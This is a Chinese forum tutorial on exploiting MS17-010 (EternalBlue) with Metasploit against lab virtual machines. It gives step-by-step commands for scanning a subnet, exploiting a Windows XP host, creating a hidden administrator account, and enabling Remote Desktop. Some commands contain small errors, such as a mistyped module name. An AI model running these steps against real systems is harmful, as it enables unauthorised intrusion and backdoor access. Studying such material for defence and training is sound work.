找回密码
 register

QQ登录

只需一步,快速开始

查看: 2555|回复: 0

[每天自学] Metasploit之MS17-010远程执行代码漏洞利用过程

[复制链接]

[每天自学] Metasploit之MS17-010远程执行代码漏洞利用过程

[复制链接]
  • 打卡等级:热心大叔
  • 打卡总天数:94
  • 打卡月天数:17
  • 打卡总奖励:94
  • 最近打卡:2025-01-18 01:28:20
Waylee

主题

0

回帖

1万

积分

仙帝

积分
11929
Waylee 2020-7-7 23:04 | 显示全部楼层 |阅读模式

马上注册,查看网站隐藏内容!!

您需要 登录 才可以下载或查看,没有账号?register

×
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。主要是攻击445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序


Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
此次采用kali Linux系统集成的metasploit进行测试验证MS17-010(永恒之蓝,著名比特币勒索漏洞)。实验环境均采用虚拟机。



Ms17-010攻击模块
exploit/windows/smb/ms17_010_eternalblue (window2008、 windows7、windows8.1、 Windows Server2012 Datacenter 9200)
exploit/windows/smb/ms17_010_psexec (windows2003、window xp 、windows2012)

扫描当前内网是否有存在ms17010的漏洞主机
use auxiliary/scanner/smb/smb_ms71_010
set rhosts 192.168.2.1-254
exploit

攻击WINXP
use exploit/windows/smb/ms17_010_psexec
set RHOST 192.168.2.245
run


进一步渗透:
进入shell:
shell
创建一个名叫blue的用户:
net user blue blue /add  
将用户blue添加入管理组  :

net localgroup administrators blue /add
开启远程桌面功能  :REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

Kali远程桌面连接Windows

rdesktop 172.16.70.199:3389


您需要登录后才可以回帖 登录 | register

本版积分规则

雪舞知识库 | 浙ICP备15015590号-1 | 萌ICP备20232229号|浙公网安备33048102000118号 |天天打卡

GMT+8, 2025-1-18 15:56 , Processed in 0.100323 second(s), 7 queries , Redis On.

Powered by XueWu Licensed

Copyright © Tencent Cloud.

快速回复 返回顶部 返回列表